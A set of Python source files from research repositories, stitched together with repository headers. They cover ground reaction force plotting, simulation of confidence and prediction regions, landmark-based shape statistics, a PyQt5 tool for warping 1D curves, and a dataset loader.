grf = np.hstack((Fx, Fy, Fz, Mx, My, Mz))
cop = np.hstack((ax, ay))
if show:
_plot(grf, cop, axs)
return grf, cop
def _plot(grf, cop, axs):
"""Plot results of the detect_peaks function, see its help."""
try:
import matplotlib.pyplot as plt
except ImportError:
print('matplotlib is not available.')
else:
grf = np.hstack((grf, cop))
if axs is None:
_, axs = plt.subplots(4, 2, figsize=(8, 6), sharex=True)
axs = axs.flatten()
ylabel = ['Fx [N]', 'Fy [N]', 'Fz [N]',
'Mx [Nm]', 'My [Nm]', 'Mz [Nm]', 'COPx [m]', 'COPy [m]']
for i, axi in enumerate(axs):
axi.plot(grf[:, i], 'b', lw=1)
axi.set_ylabel(ylabel[i], fontsize=14)
axi.yaxis.set_major_locator(plt.MaxNLocator(4))
axi.yaxis.set_label_coords(-.2, 0.5)
axs[6].set_xlabel('Sample #', fontsize=14)
axs[7].set_xlabel('Sample #', fontsize=14)
plt.suptitle('Ground reaction force data', y=1.02, fontsize=16)
plt.tight_layout(h_pad=.1)
# plt.grid()
plt.show()
``` |
{
"source": "0todd0000/ci1d",
"score": 3
} |
#### File: plot/plotly/_base.py
```python
class PatchLine(object):
def plot(self, ax, w=0.1, ec=None, fc='b', lw=1):
pass
class MultiColorPatchLine(PatchLine):
def plot(self, ax, w=0.1, cmap='jet', alpha=0.5, ec=None, ew=1, vmin=None, vmax=None, th=None):
pass
```
#### File: plot/plotly/colors.py
```python
from copy import deepcopy
import numpy as np
from matplotlib import pyplot as plt
from matplotlib import colors
_cycle_default = deepcopy( plt.rcParams['axes.prop_cycle'] )
def reset_color_cycle():
set_color_cycle('default')
def set_color_cycle(cyclename=None):
cyclename = 'cr1d' if (cyclename is None) else cyclename
setter = ColorCycleSetter()
setter.set_cycle( cyclename )
class ColorCycleSetter(object):
def __init__(self):
self.cycle_default = _cycle_default
self.cycle_cr1d = plt.cycler( color=CR1DColorMap().hex )
def set_cycle(self, cyclename='cr1d'):
if cyclename not in ['cr1d', 'default']:
raise ValueError('"cyclename" must be "cr1d" or "default"')
cycle = self.cycle_cr1d if (cyclename == 'cr1d') else self.cycle_default
plt.rcParams['axes.prop_cycle'] = cycle
class CR1DColorMap(object):
rgb = [
(148,202,130),
(150,179,221),
(187,147,194),
(153,156,205),
(126,206,244),
(127,197,194),
(127,156,172),
(192,163,108),
]
@property
def name(self):
return self.__class__.__name__
@property
def cmap(self, bgcolor=None):
return colors.LinearSegmentedColormap.from_list(self.name, self.rgb01)
@property
def hex(self):
return [colors.rgb2hex(c) for c in self.rgb01]
@property
def rgb01(self, bgcolor=None):
return 1.0/255 * np.asarray(self.rgb)
def colors(self, n):
return self.cmap( np.linspace(0, 255, n) )
def colorbar_image(self, n=256, vertical=True):
I = np.vstack([range(n)]*10)
if vertical:
I = I.T
return I
def set_prop_cycle(self, ax):
ax.set_prop_cycle(color=self.hex)
```
#### File: examples/sim/sim_bv1d.py
```python
import os
from pathlib import Path
import numpy as np
from matplotlib import pyplot as plt
import cr1d
from spm1d import rft1d
def run_single_iteration(J, fwhm):
y = mu + rft1d.random.multirandn1d(J, Q, I, fwhm, W) # bivariate Gaussian 1D data
ynew = mu + rft1d.random.multirandn1d(1, Q, I, fwhm, W)[0] # an additional random observation
ds = cr1d.BivariateDataset1D(y)
cr = ds.get_confidence_region(alpha=alpha)
pr = ds.get_prediction_region(alpha=alpha)
ci2 = ds.get_ci2(alpha=alpha)
in_cr = cr.isinside(mu) # mu in confidence region?
in_pr = pr.isinside(ynew) # ynew in prediction region?
in_ci2 = ci2.isinside(mu) # mu in CI2?
ynew_in_ci2 = ci2.isinside(ynew) # ynew in CI2?
return in_cr, in_pr, in_ci2, ynew_in_ci2
#(0) Initialize parameters:
np.random.seed(0) # seed the random number generator to replicate results
alpha = 0.05 # Type I error rate
J = np.array([5, 6, 7, 8, 9, 10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 120, 140, 160, 180, 200]) # sample sizes
FWHM = np.array([5, 10, 20, 30, 40, 50]) # smoothness values
Q = 101 # number of continuum nodes
I = 2 # number of vector components
mu = np.zeros((Q,I)) # true population mean
W = np.eye(2) # population covariance
niter = 10000 # number of simulation iterations (set this to 10000 to replicate the paper's results)
#(1) Simulate:
FPR = [] # false positive rate (outer loop)
for JJ in J:
fpr = [] # false positive rate (inner loop)
for fwhm in FWHM:
print('J=%d, FWHM=%d...'%(JJ,fwhm))
inregion = np.array([run_single_iteration(JJ, fwhm) for i in range(niter)])
avg_inregion = inregion.mean(axis=0)
fpr.append( 1 - avg_inregion )
FPR.append( fpr )
FPR = np.array(FPR)
#(2) Save results
dir0 = Path( __file__ ).parents[2] # Main repository directory
fnameNPZ = os.path.join(dir0, 'Data', 'Simulation', 'results1d.npz') # Simulation results file name
np.savez_compressed(fnameNPZ, fpr=FPR, J=J, FWHM=FWHM)
# #(3) Plot results:
# plt.close('all')
# fig,AX = plt.subplots(2, 2, figsize=(8,6) )
# for i,ax in enumerate( AX.flatten() ):
# ax.plot(J, FPR[:,:,i])
# ax.legend(['CR', 'PR', 'CI2-mu', 'CI2-new'])
# ax.axhline(0.05, color='k', ls=':')
# plt.show()
``` |
{
"source": "0todd0000/lmfree2d",
"score": 3
} |
#### File: lmfree2d/Python/landmarks_massmv.py
```python
import os
import numpy as np
from matplotlib import pyplot as plt
import pandas as pd
import spm1d
import lmfree2d as lm
def two_sample_mass_multivariate_test(r0, r1):
# calculate test statistic values at each landmark:
spm = spm1d.stats.nonparam.hotellings2(r0, r1)
# conduct nonparametric mass-multivariate inference:
spmi = spm.inference(0.05, iterations=-1)
# assemble results:
z = spmi.z # test statistic value for each landmark
zstar = spmi.zstar # critical test statistic
zmax = z.max() # maximum test statistic value
pdf = spmi.PDF0 # permutation distribution
p = ( pdf >= zmax).mean() # p value (percentage of values in pdf greater than or equal to T2max)
return dict(zmax=zmax, zstar=zstar, p=p, z=z)
# #(0) Conduct mass multivariate two-sample test for one dataset:
# ### load data:
# dirREPO = lm.get_repository_path()
# name = 'Bell'
# fname = os.path.join(dirREPO, 'Data', name, 'landmarks_gpa.csv')
# df = pd.read_csv(fname, sep=',')
# ### convert to 3D array (nshapes, nlandmarks, 2)
# nshapes = df['SHAPE'].max()
# nlm = df['LANDMARK'].max()
# r = np.reshape( df[['X','Y']].values, (nshapes,nlm,2) )
# ### separate into groups:
# r0,r1 = r[:5], r[5:]
# ### run nonparametric permutation test:
# res = two_sample_mass_multivariate_test(r0, r1)
# print(res)
#(1) Conduct mass multivariate two-sample test for all datasets:
dirREPO = lm.get_repository_path()
names = ['Bell', 'Comma', 'Device8', 'Face', 'Flatfish', 'Hammer', 'Heart', 'Horseshoe', 'Key']
results = []
for name in names:
### load data:
fname0 = os.path.join(dirREPO, 'Data', name, 'landmarks_gpa.csv')
df = pd.read_csv(fname0, sep=',')
### convert to 3D array (nshapes, nlandmarks, 2)
nshapes = df['SHAPE'].max()
nlm = df['LANDMARK'].max()
r = np.reshape( df[['X','Y']].values, (nshapes,nlm,2) )
### separate into groups:
r0,r1 = r[:5], r[5:]
### run nonparametric permutation test:
res = two_sample_mass_multivariate_test(r0, r1)
results.append(res)
print(name, res['zmax'], res['p'])
### save:
fname1 = os.path.join(dirREPO, 'Results', 'landmarks_massmv.csv')
n = max([res['z'].size for res in results])
header = 'Name,T2max,T2crit,P,' + ','.join( ['T2-%d'%(i+1) for i in range(n)] )
with open(fname1, 'w') as f:
f.write(header + '\n')
for name,res in zip(names,results):
zmax,zc,p,z = res['zmax'], res['zstar'], res['p'], res['z']
fmt = ('%s,' + '%.3f,'*(z.size+3))[:-1] + '\n'
f.write( fmt % ((name,zmax,zc,p)+tuple(z)) )
``` |
{
"source": "0todd0000/mwarp1d",
"score": 2
} |
#### File: ui/dataio/data.py
```python
import os
import numpy as np
from scipy.io import savemat
import mwarp1d
class _MWarp1DData(object):
mode = None #manual or landmark
fname0 = None #input data file name
fname1 = None #output data file name
ydata_template = None #template continuum
ydata_sources = None #source continua
ydata_sources_warped = None #warper sources
def __init__(self):
pass
def __repr__(self):
s = '%s (%s)\n' %(self.__class__.__name__, self.mode)
s += ' ----- FILES -----\n'
s += ' fname0 = %s\n' %self.fname0
s += ' fname1 = %s\n' %self.fname1
s += ' ----- DATA -----\n'
s += ' num nodes = %d\n' %self.nnodes
s += ' num sources = %d\n' %self.nsources
return s
@property
def nnodes(self):
n = 0 if (self.ydata_template is None) else self.ydata_template.size
return n
@property
def nsources(self):
n = 0 if (self.ydata_sources is None) else self.ydata_sources.shape[0]
return n
def _init_other_attributes(self):
pass
def _parse_input_file(self, s):
y = np.loadtxt(s, delimiter=',')
self.ydata_template = y[0]
self.ydata_sources = y[1:]
self.ydata_sources_warped = y[1:].copy()
self._init_other_attributes()
def get_dictionary(self):
d = {}
d['mode'] = self.mode
d['filename0'] = self.fname0
d['filename1'] = self.fname1
d['ydata_template'] = self.ydata_template
d['ydata_sources'] = self.ydata_sources
d['ydata_sources_warped'] = self.ydata_sources_warped
return d
def save(self):
np.savez_compressed( self.filenameNPZ, self.get_dictionary() )
def save(self):
np.savez_compressed( self.fname1, **self.get_dictionary() )
def set_input_filename(self, s, read=True):
self.fname0 = s
if read:
self._parse_input_file(s)
# self._init_other_attributes()
if self.fname1 is None:
dir1 = os.path.dirname(s)
fname1 = 'mwarp1d_results.npz'
self.fname1 = os.path.join(dir1, fname1)
def set_output_filename(self, s):
self.fname1 = s
def set_sources(self, y, init_warped=False):
self.ydata_sources = y
self._init_other_attributes()
if init_warped:
self.set_sources_warped( y.copy() )
def set_sources_warped(self, y):
self.ydata_sources_warped = y
def set_template(self, y):
self.ydata_template = y
def write_mat(self, fname):
savemat(fname, self.get_dictionary(format='matlab'))
def write_sources_warped_csv(self, fname):
np.savetxt(fname, self.ydata_sources_warped, delimiter=',')
class DataLandmark(_MWarp1DData):
mode = 'landmark'
landmarks_template = None
landmarks_sources = None
landmark_labels = None
def _init_other_attributes(self):
pass
def apply_warps(self, y):
lm0 = self.landmarks_template
lm = self.landmarks_sources
J = y.shape[0]
if y.ndim==2:
if J==self.nsources: #only sources submitted
yw = [mwarp1d.warp_landmark(yy, xx, lm0) for xx,yy in zip(lm,y)]
else: #template also submitted (first row)
yw = [mwarp1d.warp_landmark(yy, xx, lm0) for xx,yy in zip(lm,y[1:])]
yw = [y[0]] + yw
else:
yw = np.random.randn(5,101,3)
Yw = []
for i in range(y.shape[2]):
if J==self.nsources: #only sources submitted
yw = [mwarp1d.warp_landmark(yy, xx, lm0) for xx,yy in zip(lm,y[:,:,i])]
else: #template also submitted (first row)
yw = [mwarp1d.warp_landmark(yy, xx, lm0) for xx,yy in zip(lm,y[1:,:,i])]
yw = [y[0,:,i]] + yw
Yw.append( np.array(yw) )
yw = np.dstack(Yw)
return np.array(yw)
def get_dictionary(self):
d = super().get_dictionary()
d['landmarks_template'] = self.landmarks_template
d['landmarks_sources'] = self.landmarks_sources
d['landmark_labels'] = self.landmark_labels
return d
def set_landmark_labels(self, x):
self.landmark_labels = x
def set_template_landmarks(self, x):
self.landmarks_template = x
def set_source_landmarks(self, x):
self.landmarks_sources = x
def write_landmarks_csv(self, fname):
labels = self.landmark_labels
lm0 = np.asarray(self.landmarks_template, dtype=str)
lm1 = np.asarray(self.landmarks_sources, dtype=str)
# write:
header = ','.join(labels)
blanks = ','.join( ['-']*len(labels) )
with open(fname, 'w') as fid:
fid.write( header + '\n' )
fid.write( ','.join(lm0) + '\n' )
fid.write( blanks + '\n' )
for a in lm1:
fid.write( ','.join(a) + '\n' )
class DataManual(_MWarp1DData):
mode = 'manual'
seqwarps = None
def _init_other_attributes(self):
J,Q = self.ydata_sources.shape
self.seqwarps = np.empty(J, dtype=object)
def apply_warps(self, y):
J,Q = y.shape[:2]
swarps = []
for params in self.seqwarps:
sw = mwarp1d.SequentialManualWarp()
if params is not None:
for p in params:
amp,center,head,tail = p
w = mwarp1d.ManualWarp1D(Q)
w.set_center(center)
w.set_amp(amp)
w.set_head(head)
w.set_tail(tail)
sw.append( w )
swarps.append(sw)
if y.ndim==2:
if J==self.nsources: #only sources submitted
yw = [ww.apply_warp_sequence(yy) for ww,yy in zip(swarps, y)]
else: #template also submitted (first row)
yw = [ww.apply_warp_sequence(yy) for ww,yy in zip(swarps, y[1:])]
yw = [y[0]] + yw
else:
yw = np.random.randn(5,101,3)
Yw = []
for i in range(y.shape[2]):
if J==self.nsources: #only sources submitted
yw = [ww.apply_warp_sequence(yy) for ww,yy in zip(swarps, y[:,:,i])]
else: #template also submitted (first row)
yw = [ww.apply_warp_sequence(yy) for ww,yy in zip(swarps, y[1:,:,i])]
yw = [y[0,:,i]] + yw
Yw.append( np.array(yw) )
yw = np.dstack(Yw)
return np.array(yw)
def get_dictionary(self, format=None):
d = super().get_dictionary()
w = self.seqwarps
if format=='matlab':
b = np.array([ww is None for ww in w])
w[b] = np.nan
d['seqwarps'] = w
return d
```
#### File: figures/artists/collection.py
```python
from PyQt5 import QtWidgets, QtCore
from . selectable_line import Template,Source
from . draggable_points import TemplateLandmarks,SourceLandmarks
from . stack import SelectionStack
class _LinePointCollection(QtCore.QObject):
LandmarksClass = TemplateLandmarks
LineClass = Template
point_deleted = QtCore.pyqtSignal(object, int)
selected = QtCore.pyqtSignal(object, int)
def __init__(self, ax, y):
super().__init__()
self.ax = ax
self.line = self.LineClass(ax, y, collection=self)
self.h = self.line.h
self.landmarks = None
self.stack = None
def add_landmark(self, x):
self.landmarks.add_point(x)
def get_line_x(self):
return self.line.get_xdata()
def get_line_y(self):
return self.line.get_ydata()
@property
def isvisible(self):
return self.line.isvisible
def on_point_deleted(self, ind):
self.point_deleted.emit(self.landmarks, ind)
def set_landmarks(self, x):
self.landmarks = self.LandmarksClass(self.ax, x, y_constraint=self.get_line_y(), collection=self)
self.stack = SelectionStack(self.ax, [self.landmarks, self.line])
self.line.set_notify(False)
self.landmarks.set_notify(False)
self.stack.set_notify(True)
self.selected = self.stack.selected
self.landmarks.point_deleted.connect( self.on_point_deleted )
def set_active(self, active):
self.line.set_active(active)
if self.landmarks is not None:
self.landmarks.set_active(active)
def set_notify(self, notify):
self.stack.set_notify(notify)
def set_visible(self, visible):
self.landmarks.set_visible(visible)
self.line.set_visible(visible)
class SourceWithLandmarks(_LinePointCollection):
LandmarksClass = SourceLandmarks
LineClass = Source
def calculate_mse(self, template):
y0 = template.line.h.get_ydata()
y = self.h.get_ydata()
return ((y-y0)**2).mean()
class TemplateWithLandmarks(_LinePointCollection):
LandmarksClass = TemplateLandmarks
LineClass = Template
```
#### File: figures/artists/draggable_points.py
```python
from PyQt5 import QtWidgets, QtCore
from math import floor
import numpy as np
from . _base import _SelectableArtist2D
class _DraggablePoints(_SelectableArtist2D):
dragged = QtCore.pyqtSignal(object, int, int, float)
dragging_stopped = QtCore.pyqtSignal()
point_added = QtCore.pyqtSignal(int, int)
point_deleted = QtCore.pyqtSignal(int)
point_delete_failed = QtCore.pyqtSignal()
maxpointsreached = QtCore.pyqtSignal(int)
color_active = 0.98, 0.7, 0.3
color_inactive = '0.7'
dragging_enabled = True
dragging = False
# n = 0 #number of points
nmax = 8 #maximum number of points
selected_ind = None
xminmax = None
def __init__(self, ax, x, y_constraint=None, collection=None):
super().__init__(ax, collection)
self.Q = y_constraint.size
# self.n = len(x)
self.h = self.ax.plot(x, y_constraint[x], 'o', ms=8, color=self.color_active, markeredgecolor='w', zorder=self.zorder)[0]
self.y_constraint = y_constraint
self.ax.figure.canvas.mpl_connect('button_release_event', self.on_release)
self.ax.figure.canvas.mpl_connect('motion_notify_event', self.on_motion)
@property
def n(self):
return self.h.get_xdata().size
@property
def values(self):
return self.h.get_xdata()
def add_point(self, x):
if self.n < self.nmax:
y = self.y_constraint[x]
x0,y0 = self.get_point_coordinates()
x0,y0 = np.append(x0, x), np.append(y0, y)
ind = np.argsort(x0)
self.set_point_coordinates(x0[ind], y0[ind])
# self.n += 1
self.ax.figure.canvas.draw()
col = x0[ind].tolist().index(x)
self.point_added.emit(col, x)
else:
self.maxpointsreached.emit(self.nmax)
def delete_point(self, ind):
deleted = False
if self.n > 1:
x,y = self.get_point_coordinates()
x = np.hstack((x[:ind], x[ind+1:]))
y = np.hstack((y[:ind], y[ind+1:]))
self.set_point_coordinates(x, y)
deleted = True
self.point_deleted.emit(ind)
self.ax.figure.canvas.draw()
else:
self.point_delete_failed.emit()
return deleted
def get_point_coordinates(self):
x,y = self.h.get_xdata(), self.h.get_ydata()
return x,y
def get_previous_point(self, ind):
return None if (ind==0) else (ind-1)
def get_previous_x(self, ind0):
ind = self.get_previous_point(ind0)
return None if (ind is None) else self.h.get_xdata()[ind]
def get_next_point(self, ind):
return None if (ind==(self.n-1)) else (ind+1)
def get_next_x(self, ind0):
ind = self.get_next_point(ind0)
return None if (ind is None) else self.h.get_xdata()[ind]
def get_xminmax(self, ind):
x0,x1 = self.get_previous_x(ind), self.get_next_x(ind)
x0 = 2 if (x0 is None) else x0+2
x1 = self.Q-3 if (x1 is None) else x1-2
return x0,x1
def on_motion(self, event):
if event.inaxes:
# # self.crosshairs.update(x, y)
if self.dragging_enabled and self.dragging:
ind = self.selected_ind
x = floor(event.xdata)
x0,x1 = self.xminmax
x = min(x1, max(x0, x))
y = self.y_constraint[x]
self.set_data(ind, x, y)
self.dragged.emit(self, ind, x, y)
def on_selected(self, ind, distance):
super().on_selected(ind, distance)
self.dragging = True
self.selected_ind = ind
self.xminmax = self.get_xminmax(ind)
def on_release(self, event):
self.dragging_stopped.emit()
self.dragging = False
self.selected_ind = None
self.xminmax = None
def set_active(self, active):
super().set_active(active)
self.isselectable = active
def set_all_xdata(self, x):
self.h.set_xdata(x)
self.h.set_ydata( self.y_constraint[x] )
def set_data(self, ind, xnew, ynew):
x,y = self.h.get_xdata(), self.h.get_ydata()
x[ind] = xnew
y[ind] = ynew
self.h.set_xdata(x)
self.h.set_ydata(y)
def set_dragging_enabled(self, enabled):
self.dragging_enabled = enabled
def set_point_coordinates(self, x, y):
self.h.set_xdata(x)
self.h.set_ydata(y)
class SourceLandmarks(_DraggablePoints):
color_active = 0.98, 0.7, 0.3
zorder = 1
def set_active(self, active):
super().set_active(active)
self.h.set_visible(active)
class TemplateLandmarks(_DraggablePoints):
color_active = 0.3, 0.3, 0.98
zorder = 3
```
#### File: figures/artists/warpable_line.py
```python
from PyQt5 import QtWidgets, QtCore
import numpy as np
from . _base import _SelectableArtist2D
import mwarp1d
class _WarpableLine(_SelectableArtist2D):
linewidth = 0.5
iswarpable = True
selected = QtCore.pyqtSignal(object, int, float)
warp_initiated = QtCore.pyqtSignal(object, int)
def __init__(self, ax, y):
super().__init__(ax, None)
self.Q = y.size
self.x0 = np.arange(self.Q) #original (unwarped) domain
self.y0 = y #original (unwarped) data
self.xw = self.x0.copy() #current warped domain
self.yw = y.copy() #current warped data (updated only after saving warp)
self.seqw = mwarp1d.SequentialManualWarp()
self.h0 = self.ax.plot(y, ':', lw=2, color=(0.8,0.3,0.3), zorder=self.zorder-1)[0] #original, unwarped curve
self.h = self.ax.plot(y, '-', lw=self.linewidth, color=self.color_active, zorder=self.zorder)[0] #current warped curve
self.h0.set_visible(False)
def on_press(self, event):
if self.isselectable:
if event.button == 1 and self.isvisible:
mx,my = event.xdata, event.ydata #mouse coordinates
ind,d = self.distance2mouseclick(mx, my)
if d < self.threshold:
self.isselected = True
self.selected.emit(self, ind, d)
else:
self.isselected = False
def reset_domain(self):
self.h.set_xdata(self.x0)
self.h.set_ydata(self.y0)
self.xw = self.x0.copy()
self.yw = self.y0.copy()
self.seqw.reset()
def revert_to_previous_warp(self):
self.set_warped_domain( self.xw )
# self.xw = self.x0.copy()
def save_warp(self, warp):
self.xw = self.x0.copy()
self.yw = warp.apply_warp( self.h.get_ydata().copy() )
self.seqw.append(warp.copy())
self.h.set_xdata( self.xw )
self.h.set_ydata( self.yw )
def set_original_visible(self, visible=True):
self.h0.set_visible(visible)
def set_warped_domain(self, x):
self.h.set_xdata(x)
def set_warped_ydata(self, y):
self.yw = y
self.h.set_ydata(y)
def toggle_original_source_visibility(self):
self.h0.set_visible( not self.h0.get_visible() )
def update_warped_domain(self, xw):
xw_new = self.xw + (xw - self.x0)
self.set_warped_domain( xw_new )
class WarpableSource(_WarpableLine):
linewidth = 0.5
zorder = 0
def calculate_mse(self, template, normalized=True):
if normalized:
y0 = template.get_ydata_normalized()
y = self.get_ydata_normalized()
else:
y0 = template.h.get_ydata()
y = self.h.get_ydata()
return ((y-y0)**2).mean()
class WarpableTemplate(_WarpableLine):
iswarpable = False
linewidth = 5
zorder = 2
```
#### File: ui/figures/simple_figure.py
```python
import sys,os
from PyQt5 import QtWidgets, QtCore, uic
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.figure import Figure
from matplotlib import cm
import numpy as np
class SimpleFigure(FigureCanvas):
def __init__(self, parent=None):
self.figure = Figure(dpi=100)
self.ax = self.figure.add_axes([0,0,1,1])
super().__init__(self.figure)
self.setParent(parent)
super().setSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
super().updateGeometry()
self.setFocusPolicy( QtCore.Qt.ClickFocus )
self.setFocus()
def plot(self, y):
self.ax.plot( y.T )
def plot_mv(self, y):
n = y.shape[2]
colors = cm.jet( np.linspace(0, 1, n) )
for i,c in enumerate(colors):
self.ax.plot( y[:,:,i].T, color=c, lw=0.5 )
def reset(self):
self.ax.cla()
self.ax.figure.canvas.draw()
```
#### File: mwarp1d/ui/panel_main.py
```python
import sys,os
from PyQt5 import QtWidgets, QtCore, uic
import numpy as np
from widgets import FileSaveDialog,MessageBox
import dataio
class MainPanel(QtWidgets.QWidget):
def __init__(self, parent=None):
super().__init__(parent=parent)
fnameUI = os.path.join( os.path.dirname(__file__), 'panel_main.ui' )
uic.loadUi(fnameUI, self)
self.fname = None #data file name
self.fname1 = None #results file name
self.mainapp = parent
self.template_array = None
self.sources_array = None
self.stackedwidget.setCurrentIndex(0)
self.groupbox_warping_mode.setEnabled(False)
self.label_drop_data_files.set_filetypes( ['CSV', 'NPZ'] )
### connect callbacks:
self.button_clear.clicked.connect(self.on_button_clear)
self.button_landmarks.clicked.connect(self.on_button_landmarks)
self.button_manual.clicked.connect(self.on_button_manual)
self.label_drop_data_files.files_dropped.connect( self.on_drop )
self.label_filename_results.clicked.connect( self.on_button_filename )
@staticmethod
def _loadtxt(fname):
try:
y = np.loadtxt(fname, delimiter=',')
except ValueError:
y = np.loadtxt(fname, delimiter=',', encoding='utf-8-sig')
return y
def _plot(self):
y0 = self.template_array
y = self.sources_array
ax = self.fig.ax
h0 = ax.plot( y0, lw=5, color='k')[0]
h1 = ax.plot( y.T, lw=1, color='0.8')[0]
ax.legend([h0,h1], ['Template','Source'])
ax.figure.canvas.draw()
def on_button_clear(self):
self.reset_panel()
def on_button_filename(self):
fname = None
dialog = FileSaveDialog('npz')
dialog.setDirectory( os.path.dirname(self.fname1) )
dialog.setAcceptMode(QtWidgets.QFileDialog.AcceptSave)
s = os.path.split( self.fname1 )[-1]
dialog.selectFile( s )
if dialog.exec_() == QtWidgets.QDialog.Accepted:
fname = dialog.selectedFiles()[0]
if fname is not None:
self.fname1 = fname
self.label_filename_results.setText( fname )
return fname
def on_button_landmarks(self):
self.mainapp.start_landmark_mode(self.template_array, self.sources_array, self.fname, self.fname1)
def on_button_manual(self):
self.mainapp.start_manual_mode(self.template_array, self.sources_array, self.fname, self.fname1)
def on_drop(self, filenames):
success = False
nfiles = len(filenames)
if nfiles==1:
fname = filenames[0]
ext = os.path.splitext(fname)[1]
self.mainapp.set_default_directory( os.path.dirname(fname) )
if ext=='.csv':
fname1 = self.mainapp.get_results_filename(fname)
y = self._loadtxt(fname)
y0,y = y[0], y[1:]
self.fname = fname
self.fname1 = fname1
self.template_array = y0
self.sources_array = y
self._plot()
self.label_nsources.setText( str(y.shape[0]) )
self.label_nnodes.setText( str(y0.size) )
self.label_filename_results.setText( fname1 )
success = True
elif ext=='.npz':
data = dataio.loadnpz(fname)
self.start_npz(data)
else:
MessageBox('Error: only csv and npz')
self.label_drop_data_files.set_color(0)
if success:
self.stackedwidget.setCurrentIndex(1)
self.groupbox_warping_mode.setEnabled(True)
def reset_panel(self):
self.label_filename_results.setText( "" )
self.label_nsources.setText( "" )
self.label_nnodes.setText( "" )
self.groupbox_warping_mode.setEnabled(False)
self.label_drop_data_files.reset_color()
self.fname = None
self.fname1 = None
self.template_array = None
self.sources_array = None
self.fig.reset()
self.stackedwidget.setCurrentIndex(0)
def set_fname_results(self, s):
self.fname1 = s
self.label_filename_results.setText( s )
def start_npz(self, data):
self.mainapp.start_npz(data)
if __name__ == '__main__':
app = QtWidgets.QApplication(sys.argv)
widget = MainPanel()
widget.show()
sys.exit(app.exec_())
```
#### File: ui/widgets/table_landmarks.py
```python
import sys,os
import numpy as np
from PyQt5 import QtWidgets, QtGui, QtCore
class VHeaderContextMenu(QtWidgets.QMenu):
def __init__(self, parent, row):
super().__init__(parent)
menu = QtWidgets.QMenu(self)
label = 'Unflag' if parent.rowflags[row] else 'Flag'
a = QtWidgets.QAction(label, self)
a.triggered.connect( lambda: parent.toggle_flag(row) )
menu.addAction(a)
menu.popup( QtGui.QCursor.pos() )
class _LandmarksTable(QtWidgets.QTableWidget):
def __init__(self, *args):
super().__init__(*args)
self.cellcolors = [QtGui.QColor(*x) for x in [(255,255,255), (200,200,200)]]
self.fontcolors = [QtGui.QColor(*x) for x in [(200,200,200), (200,100,100), (50,150,50)]]
def _build_table(self, update_counts=False):
self.setRowCount( self.nrow )
self.setColumnCount( self.ncol )
[self.setColumnWidth(i, 50) for i in range(self.ncol)]
for i in range( self.nrow ):
for ii in range( self.ncol ):
item = QtWidgets.QTableWidgetItem()
item.setTextAlignment( QtCore.Qt.AlignCenter )
self.setItem(i, ii, item)
item.setText( str(self.A[i,ii]) )
item.setFlags( QtCore.Qt.ItemIsEnabled )
if update_counts:
self.panel.update_counts()
def _set_row_color(self, ind, c):
for i in range(self.ncol):
self.item(ind,i).setBackground( c )
def delete_landmark(self, col):
labels = self.get_landmark_names()
labels.pop(col)
self.A = np.hstack([self.A[:,:col], self.A[:,col+1:] ])
self._build_table(update_counts=True)
self.setHorizontalHeaderLabels( labels )
def get_landmark_names(self):
return [self.horizontalHeaderItem(c).text() for c in range(self.ncol)]
def insert_landmark(self, col, x):
i = col
z = np.array([[x]*self.nrow], dtype=int).T
labels = [self.horizontalHeaderItem(c).text() for c in range(self.ncol)]
labels.insert(i, 'L')
self.A = np.hstack([self.A[:,:i], z, self.A[:,i:] ])
self._build_table(update_counts=True)
self.setHorizontalHeaderLabels( labels )
def rename_landmark(self, col):
self.panel.rename_landmark(col)
@QtCore.pyqtSlot(QtCore.QPoint)
def on_vheader_rightclick(self, point):
index = self.indexAt(point)
row = index.row()
if row >0 :
menu = VHeaderContextMenu(self, row)
def on_vertical_header(self, index):
if index>0:
for i in range(1, self.nrow):
self._set_row_color(i, self.cellcolors[0])
self._set_row_color(index, self.cellcolors[1])
@property
def ncol(self):
return self.A.shape[1]
@property
def nrow(self):
return self.A.shape[0]
def toggle_flag(self, row):
self.rowflags[row] = not self.rowflags[row]
class LandmarksTableTemplate(_LandmarksTable):
def _init(self, panel):
self.panel = panel
self.A = np.array([[25, 50, 75]])
self._build_table()
self.setHorizontalHeaderLabels(['L%d'%(i+1) for i in range(self.ncol)])
self.horizontalHeader().sectionClicked.connect(self.panel.rename_landmark)
self.setVerticalHeaderLabels(['___'])
self.setVerticalScrollBarPolicy( QtCore.Qt.ScrollBarAlwaysOff )
self.verticalHeaderItem(0).setForeground( QtGui.QBrush( QtGui.QColor( *[240]*3 ) ) )
class LandmarksTableSources(_LandmarksTable):
def _init(self, panel):
self.panel = panel
n = 8
self.A = np.vstack([[25]*n, [50]*n, [75]*n]).T
self.rowflags = [False]*self.nrow
self._build_table()
self.setHorizontalHeaderLabels( panel.get_landmark_names() )
self.setVerticalHeaderLabels(['%03d'%(i+1) for i in range(self.nrow)])
self.horizontalHeader().sectionClicked.connect(self.panel.rename_landmark)
vheader = self.verticalHeader()
vheader.sectionClicked.connect(self.on_vertical_header)
vheader.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)
vheader.customContextMenuRequested.connect(self.on_vheader_rightclick)
``` |
{
"source": "0todd0000/nlreg1d",
"score": 3
} |
#### File: nlreg1d/nlreg1d/data.py
```python
import os,pathlib
import numpy as np
from matplotlib import pyplot as plt
from . import dirDATA
class _Dataset(object):
fpath = None # path to data file
def __init__(self):
self.dv = None # dependent variable
self.group = None # group
self._load()
def __repr__(self):
s = f'Dataset: {self.name}\n'
s += f' fpath = {self.fpath}\n'
s += f' shape = {self.shape}\n'
s += f' groups = {self.ug.tolist()}\n'
return s
def _load(self):
a = np.loadtxt( self.fpath, delimiter=',')
self.group = np.asarray(a[:,0], dtype=int)
self.dv = a[:,1:]
@property
def J(self): # number of observations
return self.dv.shape[0]
@property
def Q(self): # number of grid points
return self.dv.shape[1]
@property
def filename(self): # dataset name
return os.path.split( self.fpath )[1]
@property
def name(self): # dataset name
return self.__class__.__name__
@property
def q(self): # grid points (equally spaced over [0,1])
return np.linspace(0, 1, self.Q)
@property
def shape(self): # dependent variable array shape
return self.dv.shape
@property
def ug(self): # unique group labels
return np.unique(self.group)
def get_dv_by_group(self):
return [self.dv[self.group==u] for u in self.ug]
def plot(self, ax=None, colors=('b', 'r')):
ax = plt.gca() if (ax is None) else ax
y0,y1 = self.get_dv_by_group()
ax.plot(self.q, y0.T, color=colors[0], lw=0.3)
ax.plot(self.q, y1.T, color=colors[1], lw=0.3)
h0 = ax.plot(self.q, y0.mean(axis=0), color=colors[0], lw=5)[0]
